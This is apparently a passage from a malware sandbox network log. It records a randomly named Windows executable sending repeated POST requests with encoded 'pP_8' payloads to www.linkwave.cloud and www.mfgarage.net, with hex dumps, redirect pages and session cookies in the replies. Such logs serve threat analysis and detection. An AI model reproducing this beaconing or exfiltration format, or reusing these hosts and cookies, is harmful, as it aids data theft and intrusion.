                                                      Sep 11, 2024 11:19:10.107368946 CEST392INHTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Wed, 11 Sep 2024 09:19:10 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 252
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 70 50 5f 38 3d 33 71 49 52 66 51 6c 2f 41 4b 64 6f 31 6d 79 55 75 4f 48 56 68 31 59 6a 62 5a 41 5a 7a 54 4c 59 5a 34 4e 6d 78 4a 6f 75 5a 44 73 74 38 6e 46 59 47 46 6d 66 4a 6a 7a 71 55 66 6b 36 56 45 6d 4c 38 31 76 35 6f 30 6c 46 5a 68 74 65 35 2b 67 44 78 2b 73 66 46 4a 7a 6e 39 76 32 38 47 2f 4a 32 66 72 39 42 77 41 31 71 77 57 76 39 62 31 32 65 72 43 41 6b 35 33 59 3d 26 56 30 51 68 3d 34 70 42 74 61 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?pP_8=3qIRfQl/AKdo1myUuOHVh1YjbZAZzTLYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfFJzn9v28G/J2fr9BwA1qwWv9b12erCAk53Y=&V0Qh=4pBta8"}</script></head></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      29192.168.2.4633453.33.130.190803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:19:15.172907114 CEST769OUTPOST /al6z/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.linkwave.cloud
                                                      Origin: http://www.linkwave.cloud
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.linkwave.cloud/al6z/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 59 54 71 74 69 44 6f 6f 77 42 63 70 4d 33 56 70 65 76 4d 74 50 77 44 53 55 74 71 36 66 74 79 52 55 35 5a 54 33 78 31 50 44 4f 54 67 59 6a 62 59 65 2b 57 66 41 7a 58 33 56 50 56 79 4e 57 65 55 78 59 44 66 47 37 4c 77 7a 42 45 6c 61 61 2f 33 76 35 57 66 72 2b 67 42 62 63 54 31 4e 52 75 31 32 62 4a 57 6b 63 6e 33 46 47 51 70 77 64 79 67 67 6d 6e 75 6e 76 33 48 47 53 68 48 4b 32 77 49 67 49 5a 34 67 68 6b 55 52 57 4f 37 37 71 34 70 77 33 41 6b 4a 4c 66 33 71 61 42 36 34 6e 36 74 46 41 6f 71 4d 2f 52 39 47 35 6a 33 59 78 56 57 66 74 76 6b 37 63 70 56 76 58 53 38 39 37 69 2b 4b 77 3d 3d
                                                      Data Ascii: pP_8=YTqtiDoowBcpM3VpevMtPwDSUtq6ftyRU5ZT3x1PDOTgYjbYe+WfAzX3VPVyNWeUxYDfG7LwzBElaa/3v5Wfr+gBbcT1NRu12bJWkcn3FGQpwdyggmnunv3HGShHK2wIgIZ4ghkURWO77q4pw3AkJLf3qaB64n6tFAoqM/R9G5j3YxVWftvk7cpVvXS897i+Kw==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      30192.168.2.4633463.33.130.190803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:19:17.723570108 CEST789OUTPOST /al6z/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.linkwave.cloud
                                                      Origin: http://www.linkwave.cloud
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.linkwave.cloud/al6z/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 59 54 71 74 69 44 6f 6f 77 42 63 70 4d 57 6c 70 63 4d 30 74 65 41 44 54 58 74 71 36 52 4e 79 56 55 35 46 54 33 77 42 68 44 38 33 67 59 47 2f 59 52 63 75 66 44 7a 58 33 41 2f 56 33 54 6d 65 62 78 59 66 39 47 36 6e 77 7a 42 67 6c 61 65 7a 33 6f 49 57 63 74 2b 67 50 64 63 54 33 4a 52 75 31 32 62 4a 57 6b 59 32 51 46 47 49 70 77 73 43 67 68 45 50 74 37 2f 33 41 53 43 68 48 62 6d 77 4d 67 49 59 62 67 6c 6c 63 52 55 32 37 37 71 49 70 77 6d 41 6e 41 4c 66 78 6c 36 41 30 78 6d 72 37 4e 6a 46 79 42 75 70 7a 48 35 6e 31 55 58 45 4d 4f 63 4f 7a 70 63 4e 6d 79 51 62 49 77 34 66 33 52 79 48 69 69 77 6e 4e 76 32 4e 57 4f 45 77 5a 36 36 4a 44 53 37 77 3d
                                                      Data Ascii: pP_8=YTqtiDoowBcpMWlpcM0teADTXtq6RNyVU5FT3wBhD83gYG/YRcufDzX3A/V3TmebxYf9G6nwzBglaez3oIWct+gPdcT3JRu12bJWkY2QFGIpwsCghEPt7/3ASChHbmwMgIYbgllcRU277qIpwmAnALfxl6A0xmr7NjFyBupzH5n1UXEMOcOzpcNmyQbIw4f3RyHiiwnNv2NWOEwZ66JDS7w=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      31192.168.2.4633473.33.130.190803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:19:20.268410921 CEST10871OUTPOST /al6z/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.linkwave.cloud
                                                      Origin: http://www.linkwave.cloud
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.linkwave.cloud/al6z/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 59 54 71 74 69 44 6f 6f 77 42 63 70 4d 57 6c 70 63 4d 30 74 65 41 44 54 58 74 71 36 52 4e 79 56 55 35 46 54 33 77 42 68 44 38 2f 67 59 77 7a 59 51 37 36 66 43 7a 58 33 63 76 56 32 54 6d 65 38 78 59 58 35 47 36 36 4e 7a 44 49 6c 61 37 76 33 70 36 75 63 34 4f 67 50 66 63 54 30 4e 52 75 61 32 59 68 53 6b 63 53 51 46 47 49 70 77 76 71 67 6b 6d 6e 74 35 2f 33 48 47 53 68 31 4b 32 77 6b 67 49 42 67 67 6c 68 4d 51 6c 57 37 37 4b 59 70 7a 55 59 6e 63 62 66 7a 78 61 42 70 78 6d 6d 6c 4e 69 70 2b 42 75 4d 59 48 37 37 31 46 44 42 4b 4b 34 2b 49 2f 4b 46 66 70 58 7a 59 37 49 36 30 66 55 6e 4c 69 68 7a 59 34 6c 46 66 4d 45 6f 63 2f 6f 30 49 47 75 6e 72 6b 53 75 4a 61 6d 59 70 30 6b 30 71 53 67 4c 6e 47 70 48 71 4b 5a 73 55 74 63 4a 7a 78 4c 38 59 30 32 31 73 69 31 4c 47 43 41 66 6f 56 6b 78 7a 65 42 49 67 74 59 58 78 57 44 41 42 62 69 4c 64 31 52 33 58 52 69 70 50 73 32 2b 30 55 71 70 36 68 6f 42 62 64 31 31 6d 6f 32 66 74 61 46 37 70 42 6a 56 6e 69 66 49 4f 64 63 6a 49 66 57 62 49 54 4c 4a 4e 75 [TRUNCATED]
                                                      Data Ascii: pP_8=YTqtiDoowBcpMWlpcM0teADTXtq6RNyVU5FT3wBhD8/gYwzYQ76fCzX3cvV2Tme8xYX5G66NzDIla7v3p6uc4OgPfcT0NRua2YhSkcSQFGIpwvqgkmnt5/3HGSh1K2wkgIBgglhMQlW77KYpzUYncbfzxaBpxmmlNip+BuMYH771FDBKK4+I/KFfpXzY7I60fUnLihzY4lFfMEoc/o0IGunrkSuJamYp0k0qSgLnGpHqKZsUtcJzxL8Y021si1LGCAfoVkxzeBIgtYXxWDABbiLd1R3XRipPs2+0Uqp6hoBbd11mo2ftaF7pBjVnifIOdcjIfWbITLJNuUwMukMIdLwDpnhIffou0rHIqy1pavdljN/QxnrxU/CPxG0a5eLbgnwJvovQcCYnH/Eg1GyU37VhQhD6Em6Z2FMKm+HQmkPBApzSPUr9ZhD525tVMKHXFA9nUJIYTE/y+XntoNBQwtw08Uad/RWCvD4fg3LcDfmh9BN2U5zYKxeg7al3hPzPwr6sNvRQbEKkzcIn8rC0sqiyJ5LTKaLjIEZcuUy7zLQCASoDU+7vt5WowoJyBbBfQ7KHc5xfq8gNOOuVqEqX74gbRDItVDmvcGQWdwPXSfr4dPX2KXnNa8q74SI60BKNuZZ9yebY5qBQ1T5vPNNTWZ5CZSDNMviHFg0wvd+hcPVcSl0cZY9RK6JydX92Yfy1wWhtL7SepO3+lFk1Vv8/97lfYDdTHzYXv21iGIjLTJgpjc0M4GQ89jO+Bk4GCQIUB8Z+0BN8n1O7AJnO31k16Re1AdYDCjuRxe5/aMf2TYssV4QCPEOZRYqr466j3qqOVntVco9BiHDIzQLY3UE1qavhIcYzlClDu7gKL2KrIQ8QWrZJKf4CvEXhOLlLhgxHvbrFhBFULfLJhvSmA3/ZwCNN4Dc6xXqYrmofO+EEVGtBc58kFPTsuqSYZ6loOkyW1kSE9MvBatoNILcy03grqcXEQF96GU1Bbl0S3FCVj4S7Op9 [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      32192.168.2.4633483.33.130.190803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:19:22.816143036 CEST501OUTGET /al6z/?pP_8=VRCNh0NW0GgzXjJ9PdlWfXWwdPKpBv6LK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cps8gpdM+xYTm/p50f5dz2MVQM3pqegGrg4cw=&V0Qh=4pBta8 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.linkwave.cloud
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Sep 11, 2024 11:19:23.490638018 CEST392INHTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Wed, 11 Sep 2024 09:19:23 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 252
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 70 50 5f 38 3d 56 52 43 4e 68 30 4e 57 30 47 67 7a 58 6a 4a 39 50 64 6c 57 66 58 57 77 64 50 4b 70 42 76 36 4c 4b 36 67 69 2f 33 31 4f 49 2f 48 4c 56 7a 33 65 64 4c 4f 46 50 67 66 42 57 49 49 46 49 31 79 76 34 4b 6e 48 64 5a 2f 42 79 43 41 64 52 72 4f 77 32 39 43 70 73 38 67 70 64 4d 2b 78 59 54 6d 2f 70 35 30 66 35 64 7a 32 4d 56 51 4d 33 70 71 65 67 47 72 67 34 63 77 3d 26 56 30 51 68 3d 34 70 42 74 61 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?pP_8=VRCNh0NW0GgzXjJ9PdlWfXWwdPKpBv6LK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cps8gpdM+xYTm/p50f5dz2MVQM3pqegGrg4cw=&V0Qh=4pBta8"}</script></head></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      33192.168.2.46334985.153.138.113803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:19:28.740500927 CEST763OUTPOST /3lu7/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.mfgarage.net
                                                      Origin: http://www.mfgarage.net
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.mfgarage.net/3lu7/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 71 78 2b 49 63 70 55 41 39 6a 30 70 74 6e 67 58 65 67 70 41 34 64 79 48 31 67 48 31 72 36 56 36 45 4a 50 55 67 71 51 71 34 6c 41 58 66 66 51 62 30 4e 45 54 69 59 53 52 51 79 48 31 34 69 4e 34 4a 70 45 49 78 4f 65 53 6f 75 51 59 6e 35 48 6e 4e 69 46 62 52 49 61 72 65 46 46 73 56 6e 67 4c 32 58 50 46 56 72 6e 47 59 43 51 7a 58 68 63 6b 56 32 77 35 66 46 35 65 4f 58 2b 2f 64 39 36 67 68 36 41 4a 4e 32 4d 68 44 6c 33 70 58 67 4f 76 54 58 70 79 58 2f 46 61 65 52 37 64 44 62 6c 63 64 6c 69 31 36 6a 63 4d 59 72 6a 38 69 57 54 75 58 42 79 41 54 7a 46 59 4b 64 79 78 6c 41 43 6d 42 67 3d 3d
                                                      Data Ascii: pP_8=qx+IcpUA9j0ptngXegpA4dyH1gH1r6V6EJPUgqQq4lAXffQb0NETiYSRQyH14iN4JpEIxOeSouQYn5HnNiFbRIareFFsVngL2XPFVrnGYCQzXhckV2w5fF5eOX+/d96gh6AJN2MhDl3pXgOvTXpyX/FaeR7dDblcdli16jcMYrj8iWTuXByATzFYKdyxlACmBg==
                                                      Sep 11, 2024 11:19:29.857608080 CEST1236INHTTP/1.1 302 Found
                                                      x-content-type-options: nosniff
                                                      x-frame-options: SAMEORIGIN
                                                      content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                                      pragma: no-cache
                                                      expires: 0
                                                      cache-control: no-cache, no-store, must-revalidate
                                                      set-cookie: vid=7; Domain=.sahibinden.com; Expires=Sat, 11-Sep-2027 09:19:29 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: cdid=QDILqjVcXFmEXOnl66e160a1; Domain=.sahibinden.com; Expires=Sat, 11-Sep-2027 09:19:29 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csss=Z54BQt4A_PQ9yIeu9HlI5qtEAUQqILYJqfxD0LMR38Xp3Uiuz9RmfyuzXf4V719veaGR-SqUX8Z5sttsN5frzQ; Domain=.sahibinden.com; Expires=Wed, 11-Sep-2024 09:49:29 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csls=igcCZUOV_dj1TGeFk3x26bEeocV_uFTw_KcDcRKv3yeigNFoNbGIHI_0uhtXNnVBGQ-0LV2cFh3jtjQp2RJOHA; Domain=.sahibinden.com; Expires=Thu, 11-Sep-2025 09:19:29 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csid=jZdFKFIBuVsFizCwbWtwddbgRfQkCudIJb8K_knhX-dx54Y1L8deSPIr56tXbVKLzm2mJnrmoe4xEl0qn0ycCyK6D5PXhvwWRNe_oAyQBXUqMdavZE2CnXaiUB-xMTf4nX70JFvfO1mvZm6HgxN_RAUiF_HoG5aJUdSzb-SuPd25RVyrTk6qVoENDIWyqsvurUQCVomAnGPOJfhCa5yREQ6p8ePxZeufiQQnBlhQI7neGjthC4YQUKS_XpHC6IcvugkypoDrBj7CAP0owzqXn8id3AxZEkmXJIWKQ1GTsJnfd26x5PsP_WgEUJtvM6BHj_ZLAnWSmDXJ
                                                      Data Raw:
                                                      Data Ascii:
                                                      Sep 11, 2024 11:19:29.857626915 CEST404INData Raw: 6b 2d 71 53 65 44 6c 48 66 2d 75 61 6a 73 64 42 6b 38 33 78 75 78 7a 65 42 56 6b 44 66 74 59 7a 7a 53 63 65 7a 32 4e 57 44 32 64 6b 53 4b 4d 68 39 69 65 3b 20 44 6f 6d 61 69 6e 3d 2e 73 61 68 69 62 69 6e 64 65 6e 2e 63 6f 6d 3b 20 45 78 70 69 72
                                                      Data Ascii: k-qSeDlHf-uajsdBk83xuxzeBVkDftYzzScez2NWD2dkSKMh9ie; Domain=.sahibinden.com; Expires=Wed, 11-Sep-2024 09:34:29 GMT; Path=/; Secure; SameSite=Nonevary: User-Agentlocation: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mfga
                                                      Sep 11, 2024 11:19:29.857779026 CEST1236INHTTP/1.1 302 Found
                                                      x-content-type-options: nosniff
                                                      x-frame-options: SAMEORIGIN
                                                      content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                                      pragma: no-cache
                                                      expires: 0
                                                      cache-control: no-cache, no-store, must-revalidate
                                                      set-cookie: vid=7; Domain=.sahibinden.com; Expires=Sat, 11-Sep-2027 09:19:29 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: cdid=QDILqjVcXFmEXOnl66e160a1; Domain=.sahibinden.com; Expires=Sat, 11-Sep-2027 09:19:29 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csss=Z54BQt4A_PQ9yIeu9HlI5qtEAUQqILYJqfxD0LMR38Xp3Uiuz9RmfyuzXf4V719veaGR-SqUX8Z5sttsN5frzQ; Domain=.sahibinden.com; Expires=Wed, 11-Sep-2024 09:49:29 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csls=igcCZUOV_dj1TGeFk3x26bEeocV_uFTw_KcDcRKv3yeigNFoNbGIHI_0uhtXNnVBGQ-0LV2cFh3jtjQp2RJOHA; Domain=.sahibinden.com; Expires=Thu, 11-Sep-2025 09:19:29 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csid=jZdFKFIBuVsFizCwbWtwddbgRfQkCudIJb8K_knhX-dx54Y1L8deSPIr56tXbVKLzm2mJnrmoe4xEl0qn0ycCyK6D5PXhvwWRNe_oAyQBXUqMdavZE2CnXaiUB-xMTf4nX70JFvfO1mvZm6HgxN_RAUiF_HoG5aJUdSzb-SuPd25RVyrTk6qVoENDIWyqsvurUQCVomAnGPOJfhCa5yREQ6p8ePxZeufiQQnBlhQI7neGjthC4YQUKS_XpHC6IcvugkypoDrBj7CAP0owzqXn8id3AxZEkmXJIWKQ1GTsJnfd26x5PsP_WgEUJtvM6BHj_ZLAnWSmDXJ
                                                      Data Raw:
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      34192.168.2.46335085.153.138.113803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:19:31.292432070 CEST783OUTPOST /3lu7/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.mfgarage.net
                                                      Origin: http://www.mfgarage.net
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.mfgarage.net/3lu7/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 71 78 2b 49 63 70 55 41 39 6a 30 70 75 48 51 58 62 44 78 41 35 39 79 45 36 41 48 31 68 61 56 2b 45 4a 54 55 67 76 38 36 34 58 55 58 66 2b 67 62 31 50 67 54 68 59 53 52 66 53 48 70 31 43 4e 7a 4a 70 59 41 78 4c 2b 53 6f 75 45 59 6e 38 6a 6e 4e 52 74 59 54 59 61 6c 54 6c 46 69 52 6e 67 4c 32 58 50 46 56 72 79 72 59 43 49 7a 58 77 73 6b 55 54 4d 36 57 6c 35 5a 47 33 2b 2f 5a 39 36 73 68 36 41 72 4e 33 67 50 44 6e 50 70 58 6b 4b 76 54 47 70 7a 64 2f 46 51 51 78 36 65 4b 5a 49 34 61 56 33 6a 38 7a 41 7a 56 61 58 35 75 77 43 30 47 77 54 58 42 7a 68 72 58 61 37 46 6f 44 2f 76 61 76 38 4d 6c 6a 6b 41 4b 6d 57 44 55 5a 38 64 76 4d 2f 46 64 4d 55 3d
                                                      Data Ascii: pP_8=qx+IcpUA9j0puHQXbDxA59yE6AH1haV+EJTUgv864XUXf+gb1PgThYSRfSHp1CNzJpYAxL+SouEYn8jnNRtYTYalTlFiRngL2XPFVryrYCIzXwskUTM6Wl5ZG3+/Z96sh6ArN3gPDnPpXkKvTGpzd/FQQx6eKZI4aV3j8zAzVaX5uwC0GwTXBzhrXa7FoD/vav8MljkAKmWDUZ8dvM/FdMU=
                                                      Sep 11, 2024 11:19:31.999973059 CEST1236INHTTP/1.1 302 Found
                                                      x-content-type-options: nosniff
                                                      x-frame-options: SAMEORIGIN
                                                      content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                                      pragma: no-cache
                                                      expires: 0
                                                      cache-control: no-cache, no-store, must-revalidate
                                                      set-cookie: vid=742; Domain=.sahibinden.com; Expires=Sat, 11-Sep-2027 09:19:31 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: cdid=kIyacWYAirgt8oOA66e160a3; Domain=.sahibinden.com; Expires=Sat, 11-Sep-2027 09:19:31 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csss=w6WsFphk9OJzVduKi5_cfZsQ0G8uDEeCmMWFVN52S47jZMNH5QAvW3Zrymy2-x-VDCo6BNaNFXC690ndvNs2fg; Domain=.sahibinden.com; Expires=Wed, 11-Sep-2024 09:49:31 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csls=fKwaOJOSyZaHwH9pIZCwzBb8iqBf7BKzqM5hzKrwsADL2SWMblQLshmCBVaVlOEKylOyqPU4Q_EwbA94zwnLjw; Domain=.sahibinden.com; Expires=Thu, 11-Sep-2025 09:19:31 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csid=a3l_Dz4ouUIFsbfehgj8dO6WdUO0vY6VvI8ACpr2gVWPM2bfi2IUo13OH4_zlh9qE214pUVe-2-egNmferplQ1xnAniSlWOYaxNoyFJHRXvJyzjQ3Kbu-jk5mxoJHQSOVaTZSpsvbaFDkPl4Wd7k1g3sA51QK6eRjSmSp96lENFyf19uje-q0xjD4Y6AY6eSwdg6mWxdY4pPk0stWvjYqI6HuiZizo5A0SLM1vg54YbELCDBe8FXC1sF-j_xuibTDkGaVwPvlBjXADBzeyS7P0Y8nwSGevRTZcnfP91wtC0IdRjjeq7CfhdrooQSSOxz6hVLLEaZIL
                                                      Data Raw:
                                                      Data Ascii:
                                                      Sep 11, 2024 11:19:32.000555038 CEST407INData Raw: 42 67 48 5f 62 47 6e 54 31 6b 57 69 5a 69 41 6f 34 6a 34 61 78 6d 50 69 5f 38 61 4f 61 49 57 6d 36 62 59 43 6e 58 68 52 44 67 41 5f 72 36 59 74 47 63 72 66 70 3b 20 44 6f 6d 61 69 6e 3d 2e 73 61 68 69 62 69 6e 64 65 6e 2e 63 6f 6d 3b 20 45 78 70
                                                      Data Ascii: BgH_bGnT1kWiZiAo4j4axmPi_8aOaIWm6bYCnXhRDgA_r6YtGcrfp; Domain=.sahibinden.com; Expires=Wed, 11-Sep-2024 09:34:31 GMT; Path=/; Secure; SameSite=Nonevary: User-Agentlocation: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mf


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      35192.168.2.46335185.153.138.113803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:19:33.837366104 CEST10865OUTPOST /3lu7/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.mfgarage.net
                                                      Origin: http://www.mfgarage.net
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.mfgarage.net/3lu7/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 71 78 2b 49 63 70 55 41 39 6a 30 70 75 48 51 58 62 44 78 41 35 39 79 45 36 41 48 31 68 61 56 2b 45 4a 54 55 67 76 38 36 34 58 4d 58 66 73 34 62 31 76 63 54 67 59 53 52 57 79 48 71 31 43 4e 71 4a 70 51 45 78 4c 7a 76 6f 71 30 59 68 61 76 6e 4c 67 74 59 5a 59 61 6c 61 46 46 6a 56 6e 67 6b 32 57 2b 4e 56 72 69 72 59 43 49 7a 58 79 30 6b 64 6d 77 36 51 6c 35 65 4f 58 2b 4a 64 39 36 41 68 36 59 52 4e 33 55 78 57 44 7a 70 5a 67 75 76 65 51 39 7a 65 66 46 65 54 78 36 38 4b 5a 45 6e 61 56 72 5a 38 77 63 5a 56 61 6a 35 2b 57 33 31 46 54 37 76 51 7a 70 71 41 4b 33 46 6b 51 50 52 62 2f 38 4e 74 52 51 70 49 69 65 65 65 49 73 54 31 2b 58 7a 43 70 6d 50 4f 33 30 53 4c 44 61 6d 4b 62 54 62 58 46 72 55 50 48 4b 65 76 36 35 4c 70 47 6a 46 41 4c 6f 47 37 37 6f 61 63 62 32 69 38 37 4c 32 6f 64 72 64 53 6a 72 37 4b 38 35 5a 6c 74 62 77 6e 4e 51 76 34 68 70 36 54 51 5a 52 2f 51 71 58 53 48 63 47 63 70 33 30 66 70 6a 74 4c 35 76 48 4e 36 46 2b 65 38 2b 52 76 38 4c 68 44 76 43 53 36 45 4d 48 6c 45 69 4a 71 [TRUNCATED]
